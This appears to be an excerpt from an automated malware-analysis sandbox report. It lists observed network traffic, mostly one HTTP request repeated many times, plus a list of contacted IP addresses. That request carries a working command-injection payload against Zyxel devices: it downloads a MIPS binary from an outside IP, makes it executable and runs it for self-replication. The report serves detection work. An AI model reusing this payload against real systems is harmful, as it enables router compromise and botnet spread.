          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: unknownTCP traffic detected without corresponding DNS query: 133.228.36.202
          Source: unknownTCP traffic detected without corresponding DNS query: 157.101.22.37
          Source: unknownTCP traffic detected without corresponding DNS query: 68.64.8.202
          Source: unknownTCP traffic detected without corresponding DNS query: 74.175.79.57
          Source: unknownTCP traffic detected without corresponding DNS query: 157.0.198.137
          Source: unknownTCP traffic detected without corresponding DNS query: 157.118.41.226
          Source: unknownTCP traffic detected without corresponding DNS query: 41.113.139.69
          Source: unknownTCP traffic detected without corresponding DNS query: 197.9.204.196
          Source: unknownTCP traffic detected without corresponding DNS query: 157.78.151.137
          Source: unknownTCP traffic detected without corresponding DNS query: 197.108.105.116
          Source: unknownTCP traffic detected without corresponding DNS query: 197.107.144.206
          Source: unknownTCP traffic detected without corresponding DNS query: 157.30.45.132
          Source: unknownTCP traffic detected without corresponding DNS query: 197.167.211.115
          Source: unknownTCP traffic detected without corresponding DNS query: 41.232.14.43
          Source: unknownTCP traffic detected without corresponding DNS query: 76.56.92.111
          Source: unknownTCP traffic detected without corresponding DNS query: 19.152.65.161
          Source: unknownTCP traffic detected without corresponding DNS query: 84.60.174.242
          Source: unknownTCP traffic detected without corresponding DNS query: 197.27.3.17
          Source: unknownTCP traffic detected without corresponding DNS query: 157.119.97.29
          Source: unknownTCP traffic detected without corresponding DNS query: 157.170.30.62
          Source: unknownTCP traffic detected without corresponding DNS query: 41.226.13.131
          Source: unknownTCP traffic detected without corresponding DNS query: 8.31.93.23
          Source: unknownTCP traffic detected without corresponding DNS query: 59.223.170.227
          Source: unknownTCP traffic detected without corresponding DNS query: 109.4.211.134
          Source: unknownTCP traffic detected without corresponding DNS query: 41.246.64.142
          Source: unknownTCP traffic detected without corresponding DNS query: 122.20.69.167
          Source: unknownTCP traffic detected without corresponding DNS query: 41.30.193.21
          Source: unknownTCP traffic detected without corresponding DNS query: 41.52.71.249
          Source: unknownTCP traffic detected without corresponding DNS query: 157.118.237.219
          Source: unknownTCP traffic detected without corresponding DNS query: 41.240.252.145
          Source: unknownTCP traffic detected without corresponding DNS query: 41.2.171.172
          Source: unknownTCP traffic detected without corresponding DNS query: 197.62.216.220
          Source: unknownTCP traffic detected without corresponding DNS query: 41.96.21.64
          Source: unknownTCP traffic detected without corresponding DNS query: 197.231.50.209
          Source: unknownTCP traffic detected without corresponding DNS query: 159.215.247.177
          Source: unknownTCP traffic detected without corresponding DNS query: 157.195.214.180
          Source: unknownTCP traffic detected without corresponding DNS query: 106.212.39.13
          Source: unknownTCP traffic detected without corresponding DNS query: 157.246.180.212
          Source: unknownTCP traffic detected without corresponding DNS query: 41.112.74.119
          Source: unknownTCP traffic detected without corresponding DNS query: 41.152.30.126
          Source: unknownTCP traffic detected without corresponding DNS query: 157.116.198.99
          Source: unknownTCP traffic detected without corresponding DNS query: 197.104.118.218
          Source: unknownTCP traffic detected without corresponding DNS query: 197.223.225.65
          Source: unknownTCP traffic detected without corresponding DNS query: 157.74.216.8
          Source: unknownTCP traffic detected without corresponding DNS query: 157.80.243.135
          Source: unknownTCP traffic detected without corresponding DNS query: 197.88.74.160
          Source: unknownTCP traffic detected without corresponding DNS query: 157.82.24.201
          Source: unknownTCP traffic detected without corresponding DNS query: 157.144.8.20
          Source: unknownTCP traffic detected without corresponding DNS query: 47.129.3.229
          Source: unknownTCP traffic detected without corresponding DNS query: 197.243.16.70
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
